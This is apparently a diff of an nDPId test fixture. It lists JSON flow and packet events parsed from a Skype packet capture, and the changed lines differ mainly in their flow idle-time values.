-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431969714207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714207,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0n3BAAPUG8ERbvth9wKgBIgG7w79kPKOqTtpNdYASH\/7vYgAAAgQFoAEDAwQBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1696,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431969714207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969714207,"pkt":"0NQSxnP1PBXCt3IOCABFAAAofgBAAEAGxsnAqAEiW77YfcO\/AbtO2k11ZDyjq1AQIAAwHAAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1703,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1703,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMR1AAEAGWiPAqAEiTKehBsPATzJsmy7uAAAAALAC\/\/\/3pQAAAgQFtAEDAwUBAQgKPiOjPwAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1704,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1704,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtnFAAEAGcsPAqAEiR+4Hy8PBSU++p132AAAAALAC\/\/8aaAAAAgQFtAEDAwUBAQgKPiOjPwAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1705,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOeJAAEAGfjbAqAEiBfi63cPCeSJZV8ukAAAAALAC\/\/9xGAAAAgQFtAEDAwUBAQgKPiOjQAAAAAAEAgAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1706,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714399,"flow_last_seen":1431969714399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1431969714399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714399,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMoNAAEAGzS3AqAEiVh8jHsPD6OVaW8KbAAAAALAC\/\/9Q8QAAAgQFtAEDAwUBAQgKPiOjQAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1431969714471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714471,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8OCJAAHEGlpJWHyMewKgBIujlw8M6uTMdWlvCnKASIADQQwAAAgQFrAEDAwgEAggKABoDtj4jo0A="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1431969714471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714471,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0C5pAAEAG9CLAqAEiVh8jHsPD6OVaW8KcOrkzHoAQECwOlQAAAQEICj4jo4gAGgO2"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1721,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1431969714516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714516,"pkt":"PBXCt3IO0NQSxnP1CABFAABAzQFAAHIGuRYF+LrdwKgBInkiw8JDt9yLWVfLpbASRBDtIwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1722,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1431969714516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714516,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0avhAAEAGTSzAqAEiBfi63cPCeSJZV8ulQ7fcjIAQECx\/8gAAAQEICj4jo7UAAAAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1730,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431969714616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714616,"pkt":"PBXCt3IO0NQSxnP1CABFAABA9bZAAHMGAH5H7gfLwKgBIklPw8GfDHVAvqdd97AS\/\/\/meAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1731,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431969714616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714616,"pkt":"0NQSxnP1PBXCt3IOCABFAAA092tAAEAGMdXAqAEiR+4Hy8PBSU++p133nwx1QYAQECw01gAAAQEICj4jpBYAAAAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1742,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1431969714686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714686,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw8Ds1RmabJsu76AScSD0JwAAAgQFrAQCCAq+oN5GPiOjPwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1743,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":3,"flow_last_seen":1431969714686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714686,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08xxAAEAGmC\/AqAEiTKehBsPATzJsmy7v7NUZm4AQECyCxgAAAQEICj4jpFm+oN5G"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1755,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714902,"flow_last_seen":1431969714902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1431969714902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714902,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9lxAAEAG47DAqAEiUVNNjcPEROe9aVYgAAAAALAC\/\/\/WyQAAAgQFtAEDAwUBAQgKPiOlLwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714165,"flow_last_seen":1431969714165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714165,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431969714165,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714165,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXlBAAEAG5mHAqAEiW77YfcO\/AbtO2k10AAAAALAC\/\/\/+rQAAAgQFtAEDAwUBAQgKPiOiXAAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431969714207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714207,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0n3BAAPUG8ERbvth9wKgBIgG7w79kPKOqTtpNdYASH\/7vYgAAAgQFoAEDAwQBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1696,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431969714207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969714207,"pkt":"0NQSxnP1PBXCt3IOCABFAAAofgBAAEAGxsnAqAEiW77YfcO\/AbtO2k11ZDyjq1AQIAAwHAAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1703,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1703,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMR1AAEAGWiPAqAEiTKehBsPATzJsmy7uAAAAALAC\/\/\/3pQAAAgQFtAEDAwUBAQgKPiOjPwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1704,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1704,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtnFAAEAGcsPAqAEiR+4Hy8PBSU++p132AAAAALAC\/\/8aaAAAAgQFtAEDAwUBAQgKPiOjPwAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1705,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOeJAAEAGfjbAqAEiBfi63cPCeSJZV8ukAAAAALAC\/\/9xGAAAAgQFtAEDAwUBAQgKPiOjQAAAAAAEAgAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1706,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714399,"flow_last_seen":1431969714399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1431969714399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714399,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMoNAAEAGzS3AqAEiVh8jHsPD6OVaW8KbAAAAALAC\/\/9Q8QAAAgQFtAEDAwUBAQgKPiOjQAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1431969714471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714471,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8OCJAAHEGlpJWHyMewKgBIujlw8M6uTMdWlvCnKASIADQQwAAAgQFrAEDAwgEAggKABoDtj4jo0A="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1431969714471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714471,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0C5pAAEAG9CLAqAEiVh8jHsPD6OVaW8KcOrkzHoAQECwOlQAAAQEICj4jo4gAGgO2"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1721,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1431969714516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714516,"pkt":"PBXCt3IO0NQSxnP1CABFAABAzQFAAHIGuRYF+LrdwKgBInkiw8JDt9yLWVfLpbASRBDtIwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1722,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1431969714516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714516,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0avhAAEAGTSzAqAEiBfi63cPCeSJZV8ulQ7fcjIAQECx\/8gAAAQEICj4jo7UAAAAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1730,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431969714616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714616,"pkt":"PBXCt3IO0NQSxnP1CABFAABA9bZAAHMGAH5H7gfLwKgBIklPw8GfDHVAvqdd97AS\/\/\/meAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1731,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431969714616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714616,"pkt":"0NQSxnP1PBXCt3IOCABFAAA092tAAEAGMdXAqAEiR+4Hy8PBSU++p133nwx1QYAQECw01gAAAQEICj4jpBYAAAAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1742,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1431969714686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714686,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw8Ds1RmabJsu76AScSD0JwAAAgQFrAQCCAq+oN5GPiOjPwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1743,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":3,"flow_last_seen":1431969714686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714686,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08xxAAEAGmC\/AqAEiTKehBsPATzJsmy7v7NUZm4AQECyCxgAAAQEICj4jpFm+oN5G"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1755,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714902,"flow_last_seen":1431969714902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1431969714902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714902,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9lxAAEAG47DAqAEiUVNNjcPEROe9aVYgAAAAALAC\/\/\/WyQAAAgQFtAEDAwUBAQgKPiOlLwAAAAAEAgAA"} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1758,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":1431969714913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1431969714913,"pkt":"PBXCt3IOxCwDBkn+CABFAADBTP4AAP8Ryy3AqAFc4AAA+xTpFOkArS1IAAAAAAAEAAMAAAAAC19hZnBvdmVydGNwBF90Y3AFbG9jYWwAAAwAAQRfc21iwBgADAABBF9yZmLAGAAMAAEGX2FkaXNrwBgADAABwAwADAABAAAPuwAWE0x1Y2HigJlzIE1hY0Jvb2tQcm\/ADMAMAAwAAQAADA0AEA1MdWNh4oCZcyBpTWFjwAzAKAAMAAEAAAwNABANTHVjYeKAmXMgaU1hY8Ao"} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1759,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1431969714913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":227,"pkt_l4_len":173,"thread_ts_msec":1431969714913,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NAK0R\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QCtv5gAAAAAAAQAAwAAAAALX2FmcG92ZXJ0Y3AEX3RjcAVsb2NhbAAADAABBF9zbWLAGAAMAAEEX3JmYsAYAAwAAQZfYWRpc2vAGAAMAAHADAAMAAEAAA+7ABYTTHVjYeKAmXMgTWFjQm9va1Byb8AMwAwADAABAAAMDQAQDUx1Y2HigJlzIGlNYWPADMAoAAwAAQAADA0AEA1MdWNh4oCZcyBpTWFjwCg="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1431969714962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714962,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8ec1AAHQGLERRU02NwKgBIkTnw8TZuiW6vWlWIaASIAAuPAAAAgQFrAEDAwgEAggKALqZVz4jpS8="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1431969714962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714962,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PRZAAEAGnQPAqAEiUVNNjcPEROe9aVYh2bolu4AQECxsmQAAAQEICj4jpWsAuplX"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715510,"flow_last_seen":1431969715510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715510,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 